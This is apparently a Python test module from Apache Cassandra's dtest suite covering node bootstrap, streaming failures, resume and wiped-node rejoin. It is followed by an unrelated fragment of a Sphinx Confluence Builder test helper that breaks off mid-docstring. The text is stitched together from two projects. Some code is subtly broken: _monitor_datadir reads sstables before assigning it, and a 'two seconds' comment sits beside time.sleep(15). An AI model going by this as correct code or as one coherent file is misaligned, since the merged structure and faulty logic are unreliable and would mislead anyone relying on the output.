import os import random import re import shutil import tempfile import threading import time import logging import signal from cassandra import ConsistencyLevel from cassandra.concurrent import execute_concurrent_with_args from ccmlib.node import NodeError, TimeoutError, ToolError, Node import pytest from distutils.version import LooseVersion from dtest import Tester, create_ks, create_cf, data_size from tools.assertions import (assert_almost_equal, assert_bootstrap_state, assert_not_running, assert_one, assert_stderr_clean) from tools.data import query_c1c2 from tools.intervention import InterruptBootstrap, KillOnBootstrap, KillOnReadyToBootstrap from tools.misc import new_node, generate_ssl_stores since = pytest.mark.since logger = logging.getLogger(__name__) class TestBootstrap(Tester): byteman_submit_path_pre_4_0 = './byteman/pre4.0/stream_failure.btm' byteman_submit_path_4_0 = './byteman/4.0/stream_failure.btm' @pytest.fixture(autouse=True) def fixture_add_additional_log_patterns(self, fixture_dtest_setup): fixture_dtest_setup.allow_log_errors = True fixture_dtest_setup.ignore_log_patterns = ( # This one occurs when trying to send the migration to a # node that hasn't started yet, and when it does, it gets # replayed and everything is fine. r'Can\'t send migration request: node.*is down', # ignore streaming error during bootstrap r'Exception encountered during startup', r'Streaming error occurred' ) def _base_bootstrap_test(self, bootstrap=None, bootstrap_from_version=None, enable_ssl=None): def default_bootstrap(cluster, token): node2 = new_node(cluster) node2.set_configuration_options(values={'initial_token': token}) node2.start(wait_for_binary_proto=True) return node2 if bootstrap is None: bootstrap = default_bootstrap cluster = self.cluster if enable_ssl: logger.debug("***using internode ssl***") generate_ssl_stores(self.fixture_dtest_setup.test_path) cluster.enable_internode_ssl(self.fixture_dtest_setup.test_path) tokens = cluster.balanced_tokens(2) cluster.set_configuration_options(values={'num_tokens': 1}) logger.debug("[node1, node2] tokens: %r" % (tokens,)) keys = 10000 # Create a single node cluster cluster.populate(1) node1 = cluster.nodelist()[0] if bootstrap_from_version: logger.debug("starting source node on version {}".format(bootstrap_from_version)) node1.set_install_dir(version=bootstrap_from_version) node1.set_configuration_options(values={'initial_token': tokens[0]}) cluster.start() session = self.patient_cql_connection(node1) create_ks(session, 'ks', 1) create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}) # record the size before inserting any of our own data empty_size = data_size(node1, 'ks','cf') logger.debug("node1 empty size for ks.cf: %s" % float(empty_size)) insert_statement = session.prepare("INSERT INTO ks.cf (key, c1, c2) VALUES (?, 'value1', 'value2')") execute_concurrent_with_args(session, insert_statement, [['k%d' % k] for k in range(keys)]) node1.flush() node1.compact() initial_size = data_size(node1,'ks','cf') logger.debug("node1 size for ks.cf before bootstrapping node2: %s" % float(initial_size)) # Reads inserted data all during the bootstrap process. We shouldn't # get any error query_c1c2(session, random.randint(0, keys - 1), ConsistencyLevel.ONE) session.shutdown() # Bootstrapping a new node in the current version node2 = bootstrap(cluster, tokens[1]) node2.compact() node1.cleanup() logger.debug("node1 size for ks.cf after cleanup: %s" % float(data_size(node1,'ks','cf'))) node1.compact() logger.debug("node1 size for ks.cf after compacting: %s" % float(data_size(node1,'ks','cf'))) logger.debug("node2 size for ks.cf after compacting: %s" % float(data_size(node2,'ks','cf'))) size1 = float(data_size(node1,'ks','cf')) size2 = float(data_size(node2,'ks','cf')) assert_almost_equal(size1, size2, error=0.3) assert_almost_equal(float(initial_size - empty_size), 2 * (size1 - float(empty_size))) assert_bootstrap_state(self, node2, 'COMPLETED') @pytest.mark.no_vnodes def test_simple_bootstrap_with_ssl(self): self._base_bootstrap_test(enable_ssl=True) @pytest.mark.no_vnodes def test_simple_bootstrap(self): self._base_bootstrap_test() @pytest.mark.no_vnodes def test_bootstrap_on_write_survey(self): def bootstrap_on_write_survey_and_join(cluster, token): node2 = new_node(cluster) node2.set_configuration_options(values={'initial_token': token}) node2.start(jvm_args=["-Dcassandra.write_survey=true"], wait_for_binary_proto=True) assert len(node2.grep_log('Startup complete, but write survey mode is active, not becoming an active ring member.')) assert_bootstrap_state(self, node2, 'IN_PROGRESS') node2.nodetool("join") assert len(node2.grep_log('Leaving write survey mode and joining ring at operator request')) return node2 self._base_bootstrap_test(bootstrap_on_write_survey_and_join) def _test_bootstrap_with_compatibility_flag_on(self, bootstrap_from_version): def bootstrap_with_compatibility_flag_on(cluster, token): node2 = new_node(cluster) node2.set_configuration_options(values={'initial_token': token}) # cassandra.force_3_0_protocol_version parameter is needed to allow schema # changes during the bootstrapping for upgrades from 3.0.14+ to anything upwards for 3.0.x or 3.x clusters. # @jira_ticket CASSANDRA-13004 for detailed context on `cassandra.force_3_0_protocol_version` flag node2.start(jvm_args=["-Dcassandra.force_3_0_protocol_version=true"], wait_for_binary_proto=True) return node2 self._base_bootstrap_test(bootstrap_with_compatibility_flag_on, bootstrap_from_version=bootstrap_from_version) @since('3.10') @pytest.mark.no_vnodes def test_simple_bootstrap_small_keepalive_period(self): """ @jira_ticket CASSANDRA-11841 Test that bootstrap completes if it takes longer than streaming_socket_timeout_in_ms or 2*streaming_keep_alive_period_in_secs to receive a single sstable """ cluster = self.cluster yaml_opts = {'streaming_keep_alive_period_in_secs': 2} if cluster.version() < '4.0': yaml_opts['streaming_socket_timeout_in_ms'] = 1000 cluster.set_configuration_options(values=yaml_opts) # Create a single node cluster cluster.populate(1) node1 = cluster.nodelist()[0] logger.debug("Setting up byteman on {}".format(node1.name)) # set up byteman node1.byteman_port = '8100' node1.import_config_files() cluster.start() # Create more than one sstable larger than 1MB node1.stress(['write', 'n=1K', '-rate', 'threads=8', '-schema', 'compaction(strategy=SizeTieredCompactionStrategy, enabled=false)']) cluster.flush() logger.debug("Submitting byteman script to {} to".format(node1.name)) # Sleep longer than streaming_socket_timeout_in_ms to make sure the node will not be killed node1.byteman_submit(['./byteman/stream_5s_sleep.btm']) # Bootstraping a new node with very small streaming_socket_timeout_in_ms node2 = new_node(cluster) node2.start(wait_for_binary_proto=True) # Shouldn't fail due to streaming socket timeout timeout assert_bootstrap_state(self, node2, 'COMPLETED') for node in cluster.nodelist(): assert node.grep_log('Scheduling keep-alive task with 2s period.', filename='debug.log') assert node.grep_log('Sending keep-alive', filename='debug.log') assert node.grep_log('Received keep-alive', filename='debug.log') def test_simple_bootstrap_nodata(self): """ @jira_ticket CASSANDRA-11010 Test that bootstrap completes if streaming from nodes with no data """ cluster = self.cluster # Create a two-node cluster cluster.populate(2) cluster.start() # Bootstrapping a new node node3 = new_node(cluster) node3.start(wait_for_binary_proto=True) assert_bootstrap_state(self, node3, 'COMPLETED') def test_read_from_bootstrapped_node(self): """ Test bootstrapped node sees existing data @jira_ticket CASSANDRA-6648 """ cluster = self.cluster cluster.populate(3) cluster.start() node1 = cluster.nodes['node1'] node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8', '-schema', 'replication(factor=2)']) session = self.patient_cql_connection(node1) stress_table = 'keyspace1.standard1' original_rows = list(session.execute("SELECT * FROM %s" % (stress_table,))) node4 = new_node(cluster) node4.start(wait_for_binary_proto=True) session = self.patient_exclusive_cql_connection(node4) new_rows = list(session.execute("SELECT * FROM %s" % (stress_table,))) assert original_rows == new_rows @since('3.0') def test_bootstrap_waits_for_streaming_to_finish(self): """ Test that bootstrap completes and is marked as such after streaming finishes. """ cluster = self.cluster logger.debug("Create a cluster") cluster.populate(1) node1 = cluster.nodelist()[0] logger.debug("Start node 1") node1.start(wait_for_binary_proto=True) logger.debug("Insert 10k rows") node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8', '-schema', 'replication(factor=2)']) logger.debug("Bootstrap node 2 with delay") node2 = new_node(cluster, byteman_port='4200') node2.update_startup_byteman_script('./byteman/bootstrap_5s_sleep.btm') node2.start(wait_for_binary_proto=True) assert_bootstrap_state(self, node2, 'COMPLETED') assert node2.grep_log('Bootstrap completed', filename='debug.log') def test_consistent_range_movement_true_with_replica_down_should_fail(self): self._bootstrap_test_with_replica_down(True) def test_consistent_range_movement_false_with_replica_down_should_succeed(self): self._bootstrap_test_with_replica_down(False) def test_consistent_range_movement_true_with_rf1_should_fail(self): self._bootstrap_test_with_replica_down(True, rf=1) def test_consistent_range_movement_false_with_rf1_should_succeed(self): self._bootstrap_test_with_replica_down(False, rf=1) def _bootstrap_test_with_replica_down(self, consistent_range_movement, rf=2): """ Test to check consistent bootstrap will not succeed when there are insufficient replicas @jira_ticket CASSANDRA-11848 """ cluster = self.cluster cluster.populate(2) node1, node2 = cluster.nodelist() node3_token = None # Make token assignment deterministic if not self.dtest_config.use_vnodes: cluster.set_configuration_options(values={'num_tokens': 1}) tokens = cluster.balanced_tokens(3) logger.debug("non-vnode tokens: %r" % (tokens,)) node1.set_configuration_options(values={'initial_token': tokens[0]}) node2.set_configuration_options(values={'initial_token': tokens[2]}) node3_token = tokens[1] # Add node 3 between node1 and node2 cluster.start() node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8', '-schema', 'replication(factor={})'.format(rf)]) # change system_auth keyspace to 2 (default is 1) to avoid # "Unable to find sufficient sources for streaming" warning if cluster.cassandra_version() >= '2.2.0': session = self.patient_cql_connection(node1) session.execute(""" ALTER KEYSPACE system_auth WITH replication = {'class':'SimpleStrategy', 'replication_factor':2}; """) # Stop node2, so node3 will not be able to perform consistent range movement node2.stop(wait_other_notice=True) successful_bootstrap_expected = not consistent_range_movement node3 = new_node(cluster, token=node3_token) node3.start(wait_for_binary_proto=successful_bootstrap_expected, wait_other_notice=successful_bootstrap_expected, jvm_args=["-Dcassandra.consistent.rangemovement={}".format(consistent_range_movement)]) if successful_bootstrap_expected: # with rf=1 and cassandra.consistent.rangemovement=false, missing sources are ignored if not consistent_range_movement and rf == 1: node3.watch_log_for("Unable to find sufficient sources for streaming range") assert node3.is_running() assert_bootstrap_state(self, node3, 'COMPLETED') else: if consistent_range_movement: if cluster.version() < '4.0': node3.watch_log_for("A node required to move the data consistently is down") else: node3.watch_log_for("Necessary replicas for strict consistency were removed by source filters") else: node3.watch_log_for("Unable to find sufficient sources for streaming range") assert_not_running(node3) @since('2.2') def test_resumable_bootstrap(self): """ Test resuming bootstrap after data streaming failure """ cluster = self.cluster cluster.populate(2) node1 = cluster.nodes['node1'] # set up byteman node1.byteman_port = '8100' node1.import_config_files() cluster.start() # kill stream to node3 in the middle of streaming to let it fail if cluster.version() < '4.0': node1.byteman_submit([self.byteman_submit_path_pre_4_0]) else: node1.byteman_submit([self.byteman_submit_path_4_0]) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=TWO', '-schema', 'replication(factor=2)', '-rate', 'threads=50']) cluster.flush() # start bootstrapping node3 and wait for streaming node3 = new_node(cluster) node3.start(wait_other_notice=False) # let streaming fail as we expect node3.watch_log_for('Some data streaming failed') # bring back node3 and invoke nodetool bootstrap to resume bootstrapping node3.nodetool('bootstrap resume') node3.wait_for_binary_interface() assert_bootstrap_state(self, node3, 'COMPLETED') # cleanup to guarantee each node will only have sstables of its ranges cluster.cleanup() logger.debug("Check data is present") # Let's check stream bootstrap completely transferred data stdout, stderr, _ = node3.stress(['read', 'n=1k', 'no-warmup', '-schema', 'replication(factor=2)', '-rate', 'threads=8']) if stdout is not None: assert "FAILURE" not in stdout @since('2.2') def test_bootstrap_with_reset_bootstrap_state(self): """Test bootstrap with resetting bootstrap progress""" cluster = self.cluster cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1}) cluster.populate(2).start() node1 = cluster.nodes['node1'] node1.stress(['write', 'n=100K', '-schema', 'replication(factor=2)']) node1.flush() # kill node1 in the middle of streaming to let it fail t = InterruptBootstrap(node1) t.start() # start bootstrapping node3 and wait for streaming node3 = new_node(cluster) try: node3.start() except NodeError: pass # node doesn't start as expected t.join() node1.start() # restart node3 bootstrap with resetting bootstrap progress node3.stop(signal_event=signal.SIGKILL) mark = node3.mark_log() node3.start(jvm_args=["-Dcassandra.reset_bootstrap_progress=true"]) # check if we reset bootstrap state node3.watch_log_for("Resetting bootstrap progress to start fresh", from_mark=mark) # wait for node3 ready to query node3.wait_for_binary_interface(from_mark=mark) # check if 2nd bootstrap succeeded assert_bootstrap_state(self, node3, 'COMPLETED') def test_manual_bootstrap(self): """ Test adding a new node and bootstrapping it manually. No auto_bootstrap. This test also verify that all data are OK after the addition of the new node. @jira_ticket CASSANDRA-9022 """ cluster = self.cluster cluster.populate(2).start() (node1, node2) = cluster.nodelist() node1.stress(['write', 'n=1K', 'no-warmup', '-schema', 'replication(factor=2)', '-rate', 'threads=1', '-pop', 'dist=UNIFORM(1..1000)']) session = self.patient_exclusive_cql_connection(node2) stress_table = 'keyspace1.standard1' original_rows = list(session.execute("SELECT * FROM %s" % stress_table)) # Add a new node node3 = new_node(cluster, bootstrap=False) node3.start(wait_for_binary_proto=True) node3.repair() node1.cleanup() current_rows = list(session.execute("SELECT * FROM %s" % stress_table)) assert original_rows == current_rows def test_local_quorum_bootstrap(self): """ Test that CL local_quorum works while a node is bootstrapping. @jira_ticket CASSANDRA-8058 """ cluster = self.cluster cluster.populate([1, 1]) cluster.start() node1 = cluster.nodes['node1'] yaml_config = """ # Create the keyspace and table keyspace: keyspace1 keyspace_definition: | CREATE KEYSPACE keyspace1 WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 1, 'dc2': 1}; table: users table_definition: CREATE TABLE users ( username text, first_name text, last_name text, email text, PRIMARY KEY(username) ) WITH compaction = {'class':'SizeTieredCompactionStrategy'}; insert: partitions: fixed(1) batchtype: UNLOGGED queries: read: cql: select * from users where username = ? fields: samerow """ with tempfile.NamedTemporaryFile(mode='w+') as stress_config: stress_config.write(yaml_config) stress_config.flush() node1.stress(['user', 'profile=' + stress_config.name, 'n=200K', 'no-warmup', 'ops(insert=1)', '-rate', 'threads=10']) node3 = new_node(cluster, data_center='dc2') node3.start(jvm_args=["-Dcassandra.write_survey=true"], no_wait=True) node3_seen = False for _ in range(30): # give node3 up to 30 seconds to start ntout = node1.nodetool('status').stdout if re.search(r'UJ\s+' + node3.ip_addr, ntout): node3_seen = True break time.sleep(1) assert node3_seen, "expected {} in status:\n{}".format(node3.ip_addr, ntout) out, err, _ = node1.stress(['user', 'profile=' + stress_config.name, 'ops(insert=1)', 'n=10k', 'no-warmup', 'cl=LOCAL_QUORUM', '-rate', 'threads=10', '-errors', 'retries=2']) ntout = node1.nodetool('status').stdout assert re.search(r'UJ\s+' + node3.ip_addr, ntout), ntout logger.debug(out) assert_stderr_clean(err) regex = re.compile("Operation.+error inserting key.+Exception") failure = regex.search(str(out)) assert failure is None, "Error during stress while bootstrapping" def test_shutdown_wiped_node_cannot_join(self): self._wiped_node_cannot_join_test(gently=True) def test_killed_wiped_node_cannot_join(self): self._wiped_node_cannot_join_test(gently=False) def _wiped_node_cannot_join_test(self, gently): """ @jira_ticket CASSANDRA-9765 Test that if we stop a node and wipe its data then the node cannot join when it is not a seed. Test both a nice shutdown or a forced shutdown, via the gently parameter. """ cluster = self.cluster cluster.populate(3) cluster.start() stress_table = 'keyspace1.standard1' # write some data node1 = cluster.nodelist()[0] node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8']) session = self.patient_cql_connection(node1) original_rows = list(session.execute("SELECT * FROM {}".format(stress_table,))) # Add a new node, bootstrap=True ensures that it is not a seed node4 = new_node(cluster, bootstrap=True) node4.start(wait_for_binary_proto=True) session = self.patient_cql_connection(node4) assert original_rows == list(session.execute("SELECT * FROM {}".format(stress_table,))) # Stop the new node and wipe its data node4.stop(gently=gently) self._cleanup(node4) # Now start it, it should not be allowed to join. mark = node4.mark_log() node4.start(no_wait=True, wait_other_notice=False) node4.watch_log_for("A node with address {} already exists, cancelling join".format(node4.address_for_current_version_slashy()), from_mark=mark) def test_decommissioned_wiped_node_can_join(self): """ @jira_ticket CASSANDRA-9765 Test that if we decommission a node and then wipe its data, it can join the cluster. """ cluster = self.cluster cluster.populate(3) cluster.start() stress_table = 'keyspace1.standard1' # write some data node1 = cluster.nodelist()[0] node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8']) session = self.patient_cql_connection(node1) original_rows = list(session.execute("SELECT * FROM {}".format(stress_table,))) # Add a new node, bootstrap=True ensures that it is not a seed node4 = new_node(cluster, bootstrap=True) node4.start(wait_for_binary_proto=True) session = self.patient_cql_connection(node4) assert original_rows == list(session.execute("SELECT * FROM {}".format(stress_table,))) # Decommission the new node and wipe its data node4.decommission() node4.stop() self._cleanup(node4) # Now start it, it should be allowed to join mark = node4.mark_log() node4.start() node4.watch_log_for("JOINING:", from_mark=mark) def test_decommissioned_wiped_node_can_gossip_to_single_seed(self): """ @jira_ticket CASSANDRA-8072 @jira_ticket CASSANDRA-8422 Test that if we decommission a node, kill it and wipe its data, it can join a cluster with a single seed node. """ cluster = self.cluster cluster.populate(1) cluster.start() node1 = cluster.nodelist()[0] # Add a new node, bootstrap=True ensures that it is not a seed node2 = new_node(cluster, bootstrap=True) node2.start(wait_for_binary_proto=True) session = self.patient_cql_connection(node1) if cluster.version() >= '2.2': # reduce system_distributed RF to 2 so we don't require forceful decommission session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'1'};") session.execute("ALTER KEYSPACE system_traces WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'1'};") # Decommision the new node and kill it logger.debug("Decommissioning & stopping node2") node2.decommission() node2.stop(wait_other_notice=False) # Wipe its data for data_dir in node2.data_directories(): logger.debug("Deleting {}".format(data_dir)) shutil.rmtree(data_dir) commitlog_dir = os.path.join(node2.get_path(), 'commitlogs') logger.debug("Deleting {}".format(commitlog_dir)) shutil.rmtree(commitlog_dir) # Now start it, it should be allowed to join mark = node2.mark_log() logger.debug("Restarting wiped node2") node2.start(wait_other_notice=False) node2.watch_log_for("JOINING:", from_mark=mark) def test_failed_bootstrap_wiped_node_can_join(self): """ @jira_ticket CASSANDRA-9765 Test that if a node fails to bootstrap, it can join the cluster even if the data is wiped. """ cluster = self.cluster cluster.populate(1) cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1}) cluster.start() stress_table = 'keyspace1.standard1' # write some data, enough for the bootstrap to fail later on node1 = cluster.nodelist()[0] node1.stress(['write', 'n=100K', 'no-warmup', '-rate', 'threads=8']) node1.flush() session = self.patient_cql_connection(node1) original_rows = list(session.execute("SELECT * FROM {}".format(stress_table,))) # Add a new node, bootstrap=True ensures that it is not a seed node2 = new_node(cluster, bootstrap=True) # kill node2 in the middle of bootstrap t = KillOnBootstrap(node2) t.start() node2.start() t.join() assert not node2.is_running() # wipe any data for node2 self._cleanup(node2) # Now start it again, it should be allowed to join mark = node2.mark_log() node2.start() node2.watch_log_for("JOINING:", from_mark=mark) @since('3.0') def test_node_cannot_join_as_hibernating_node_without_replace_address(self): """ @jira_ticket CASSANDRA-14559 Test that a node cannot bootstrap without replace_address if a hibernating node exists with that address """ cluster = self.cluster cluster.populate(2) # Setting seed node to first node to make sure replaced node is not in own seed list cluster.set_configuration_options({ 'seed_provider': [{'class_name': 'org.apache.cassandra.locator.SimpleSeedProvider', 'parameters': [{'seeds': '127.0.0.1'}] }] }) cluster.start() node1 = cluster.nodelist()[0] node2 = cluster.nodelist()[1] replacement_address = node2.address() node2.stop() jvm_option = 'replace_address' logger.debug("Starting replacement node {} with jvm_option '{}={}'".format(replacement_address, jvm_option, replacement_address)) replacement_node = Node('replacement', cluster=self.cluster, auto_bootstrap=True, thrift_interface=None, storage_interface=(replacement_address, 7000), jmx_port='7400', remote_debug_port='0', initial_token=None, binary_interface=(replacement_address, 9042)) cluster.add(replacement_node, False) extra_jvm_args = [] extra_jvm_args.extend(["-Dcassandra.{}={}".format(jvm_option, replacement_address), "-Dcassandra.ring_delay_ms=10000", "-Dcassandra.broadcast_interval_ms=10000"]) wait_other_notice = False wait_for_binary_proto = False # Killing node earlier in bootstrap to prevent node making it to 'normal' status. t = KillOnReadyToBootstrap(replacement_node) t.start() replacement_node.start(jvm_args=extra_jvm_args, wait_for_binary_proto=wait_for_binary_proto, wait_other_notice=wait_other_notice) t.join() logger.debug("Asserting that original replacement node is not running") assert not replacement_node.is_running() # Assert node is actually in hibernate for test to be accurate. logger.debug("Asserting that node is actually in hibernate status for test accuracy") assert 'hibernate' in node1.nodetool("gossipinfo").stdout extra_jvm_args = [] extra_jvm_args.extend(["-Dcassandra.ring_delay_ms=10000", "-Dcassandra.broadcast_interval_ms=10000"]) logger.debug("Starting blind replacement node {}".format(replacement_address)) blind_replacement_node = Node('blind_replacement', cluster=self.cluster, auto_bootstrap=True, thrift_interface=None, storage_interface=(replacement_address, 7000), jmx_port='7400', remote_debug_port='0', initial_token=None, binary_interface=(replacement_address, 9042)) cluster.add(blind_replacement_node, False) wait_other_notice = False wait_for_binary_proto = False blind_replacement_node.start(wait_for_binary_proto=wait_for_binary_proto, wait_other_notice=wait_other_notice) # Asserting that the new node has correct log entry self.assert_log_had_msg(blind_replacement_node, "A node with the same IP in hibernate status was detected", timeout=60) # Waiting two seconds to give node a chance to stop in case above assertion is True. # When this happens cassandra may not shut down fast enough and the below assertion fails. time.sleep(15) # Asserting that then new node is not running. # This tests the actual expected state as opposed to just checking for the existance of the above error message. assert not blind_replacement_node.is_running() @since('2.1.1') def test_simultaneous_bootstrap(self): """ Attempt to bootstrap two nodes at once, to assert the second bootstrapped node fails, and does not interfere. Start a one node cluster and run a stress write workload. Start up a second node, and wait for the first node to detect it has joined the cluster. While the second node is bootstrapping, start a third node. This should fail. @jira_ticket CASSANDRA-7069 @jira_ticket CASSANDRA-9484 """ bootstrap_error = "Other bootstrapping/leaving/moving nodes detected," \ " cannot bootstrap while cassandra.consistent.rangemovement is true" cluster = self.cluster cluster.populate(1) cluster.start() node1, = cluster.nodelist() node1.stress(['write', 'n=500K', 'no-warmup', '-schema', 'replication(factor=1)', '-rate', 'threads=10']) node2 = new_node(cluster) node2.start() for _ in range(30): # wait until node2 shows up ntout = node1.nodetool('status').stdout if re.search(r'UJ\s+' + node2.ip_addr, ntout): break time.sleep(0.1) node3 = new_node(cluster, remote_debug_port='2003') try: node3.start(wait_other_notice=False, verbose=False) except NodeError: pass # node doesn't start as expected time.sleep(.5) node2.watch_log_for("Starting listening for CQL clients") node3.watch_log_for(bootstrap_error) session = self.patient_exclusive_cql_connection(node2) # Repeat the select count(*) query, to help catch # bugs like 9484, where count(*) fails at higher # data loads. for _ in range(5): assert_one(session, "SELECT count(*) from keyspace1.standard1", [500000], cl=ConsistencyLevel.ONE) def test_cleanup(self): """ @jira_ticket CASSANDRA-11179 Make sure we remove processed files during cleanup """ cluster = self.cluster cluster.set_configuration_options(values={'concurrent_compactors': 4}) cluster.populate(1) cluster.start() node1, = cluster.nodelist() for x in range(0, 5): node1.stress(['write', 'n=100k', 'no-warmup', '-schema', 'compaction(strategy=SizeTieredCompactionStrategy,enabled=false)', 'replication(factor=1)', '-rate', 'threads=10']) node1.flush() node2 = new_node(cluster) node2.start(wait_for_binary_proto=True) event = threading.Event() failed = threading.Event() jobs = 1 thread = threading.Thread(target=self._monitor_datadir, args=(node1, event, len(node1.get_sstables("keyspace1", "standard1")), jobs, failed)) thread.setDaemon(True) thread.start() node1.nodetool("cleanup -j {} keyspace1 standard1".format(jobs)) event.set() thread.join() assert not failed.is_set() def _monitor_datadir(self, node, event, basecount, jobs, failed): while True: if len(sstables) > basecount + jobs: sstables = [s for s in node.get_sstables("keyspace1", "standard1") if "tmplink" not in s] logger.error("---") for sstable in sstables: logger.error(sstable) logger.error("Current count is {}, basecount was {}".format(len(sstables), basecount)) failed.set() return if event.is_set(): return time.sleep(.1) def _cleanup(self, node): commitlog_dir = os.path.join(node.get_path(), 'commitlogs') for data_dir in node.data_directories(): logger.debug("Deleting {}".format(data_dir)) shutil.rmtree(data_dir) shutil.rmtree(commitlog_dir) @since('2.2') @pytest.mark.ported_to_in_jvm # see org.apache.cassandra.distributed.test.BootstrapBinaryDisabledTest def test_bootstrap_binary_disabled(self): """ Test binary while bootstrapping and streaming fails. This test was ported to jvm-dtest org.apache.cassandra.distributed.test.BootstrapBinaryDisabledTest, as of this writing there are a few limitations with jvm-dtest which requries this test to stay, namely vnode support (ci also tests under different configs). Once jvm-dtest supports vnodes, this test can go away in favor of that class. @jira_ticket CASSANDRA-14526, CASSANDRA-14525, CASSANDRA-16127 """ config = {'authenticator': 'org.apache.cassandra.auth.PasswordAuthenticator', 'authorizer': 'org.apache.cassandra.auth.CassandraAuthorizer', 'role_manager': 'org.apache.cassandra.auth.CassandraRoleManager', 'permissions_validity_in_ms': 0, 'roles_validity_in_ms': 0} cluster = self.cluster cluster.populate(1) node1 = cluster.nodes['node1'] # set up byteman node1.byteman_port = '8100' node1.import_config_files() cluster.start() # kill stream to node2 in the middle of streaming to let it fail if cluster.version() < '4.0': node1.byteman_submit([self.byteman_submit_path_pre_4_0]) else: node1.byteman_submit([self.byteman_submit_path_4_0]) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50', '-mode', 'native', 'cql3', 'user=cassandra', 'password=cassandra']) cluster.flush() # start bootstrapping node2 and wait for streaming node2 = new_node(cluster) node2.set_configuration_options(values=config) node2.byteman_port = '8101' # set for when we add node3 node2.import_config_files() node2.start(jvm_args=["-Dcassandra.ring_delay_ms=5000"]) self.assert_log_had_msg(node2, 'Some data streaming failed') try: node2.nodetool('join') pytest.fail('nodetool should have errored and failed to join ring') except ToolError as t: assert "Cannot join the ring until bootstrap completes" in t.stdout node2.nodetool('bootstrap resume') node2.wait_for_binary_interface() assert_bootstrap_state(self, node2, 'COMPLETED', user='cassandra', password='cassandra') # Test write survey behaviour node3 = new_node(cluster) node3.set_configuration_options(values=config) # kill stream to node3 in the middle of streaming to let it fail if cluster.version() < '4.0': node1.byteman_submit([self.byteman_submit_path_pre_4_0]) node2.byteman_submit([self.byteman_submit_path_pre_4_0]) else: node1.byteman_submit([self.byteman_submit_path_4_0]) node2.byteman_submit([self.byteman_submit_path_4_0]) node3.start(jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.ring_delay_ms=5000"]) self.assert_log_had_msg(node3, 'Some data streaming failed') self.assert_log_had_msg(node3, "Not starting client transports in write_survey mode as it's bootstrapping or auth is enabled") try: node3.nodetool('join') pytest.fail('nodetool should have errored and failed to join ring') except ToolError as t: assert "Cannot join the ring until bootstrap completes" in t.stdout node3.nodetool('bootstrap resume') self.assert_log_had_msg(node3, "Not starting client transports in write_survey mode as it's bootstrapping or auth is enabled") # Should succeed in joining node3.nodetool('join') self.assert_log_had_msg(node3, "Leaving write survey mode and joining ring at operator request") assert_bootstrap_state(self, node3, 'COMPLETED', user='cassandra', password='cassandra') node3.wait_for_binary_interface()
__init__.py
# -*- coding: utf-8 -*- """ :copyright: Copyright 2016-2022 Sphinx Confluence Builder Contributors (AUTHORS) :license: BSD-2-Clause (LICENSE) """ from bs4 import BeautifulSoup from contextlib import contextmanager from copy import deepcopy from pkg_resources import parse_version from sphinx.__init__ import __version__ as sphinx_version from sphinx.application import Sphinx from sphinx.util.console import color_terminal from sphinx.util.console import nocolor from sphinx.util.docutils import docutils_namespace from sphinxcontrib.confluencebuilder import compat from sphinxcontrib.confluencebuilder import util from threading import Event from threading import Lock from threading import Thread import inspect import json import os import shutil import sys import time try: import http.server as http_server except ImportError: import SimpleHTTPServer as http_server try: import socketserver as server_socket except ImportError: import SocketServer as server_socket # full extension name EXT_NAME = 'sphinxcontrib.confluencebuilder' class ConfluenceInstanceServer(server_socket.TCPServer): def __init__(self): """ confluence instance server Helps spawn an TCP server on a random local port to help emulate a Confluence instance. Attributes: del_req: delete requests cached by handler del_rsp: delete responses to use in the handler get_req: get requests cached by handler get_rsp: get responses to use in the handler put_req: put requests cached by handler put_rsp: put responses to use in the handler """ LOCAL_RANDOM_PORT = ('127.0.0.1', 0) server_socket.TCPServer.__init__(self, LOCAL_RANDOM_PORT, ConfluenceInstanceRequestHandler) self.mtx = Lock() self.del_req = [] self.del_rsp = [] self.get_req = [] self.get_rsp = [] self.put_req = [] self.put_rsp = [] def check_unhandled_requests(self): """ check if there are any unhandled requests still cached Provides a helper call to allow a unit test to check if there are any handled requests that have not been pop'ed from the instance. Provides an easy way to verify that no unexpected requests have been made. Returns: whether or not there are still requests cached """ with self.mtx: if self.del_req or self.get_req or self.put_req: return True return False def pop_delete_request(self): """ pop the cached delete request made to the mocked server Allows a unit test to pop the next available request path/headers that have been pushed into the mocked Confluence server. This allows a unit test to verify desired (or undesired) request values. Returns: the next delete request; ``None`` if no request was made """ try: with self.mtx: return self.del_req.pop(0) except IndexError: return None def pop_get_request(self): """ pop the cached get request made to the mocked server Allows a unit test to pop the next available request path/headers that have been pushed into the mocked Confluence server. This allows a unit test to verify desired (or undesired) request values. Returns: the next get request; ``None`` if no request was made """ try: with self.mtx: return self.get_req.pop(0) except IndexError: return None def pop_put_request(self): """ pop the cached put request made to the mocked server Allows a unit test to pop the next available request path/headers that have been pushed into the mocked Confluence server. This allows a unit test to verify desired (or undesired) request values. Returns: the next put request; ``None`` if no request was made """ try: with self.mtx: return self.put_req.pop(0) except IndexError: return None def register_delete_rsp(self, code,): """ register a delete response Registers a response the instance should return when a DELETE request is being served. Args: code: the response code """ with self.mtx: self.del_rsp.append(code) def register_get_rsp(self, code, data): """ register a get response Registers a response the instance should return when a GET request is being served. Args: code: the response code data: the data """ if data: if isinstance(data, dict): data = json.dumps(data) data = data.encode('utf-8') with self.mtx: self.get_rsp.append((code, data)) def register_put_rsp(self, code, data): """ register a put response Registers a response the instance should return when a PUT request is being served. Args: code: the response code data: the data """ if data: if isinstance(data, dict): data = json.dumps(data) data = data.encode('utf-8') with self.mtx: self.put_rsp.append((code, data)) class ConfluenceInstanceRequestHandler(server_socket.ThreadingMixIn, http_server.SimpleHTTPRequestHandler): """ confluence instance request handler Provides the handler implementation when a z instance wishes to serve an HTTP request. This handler will pull responses (if 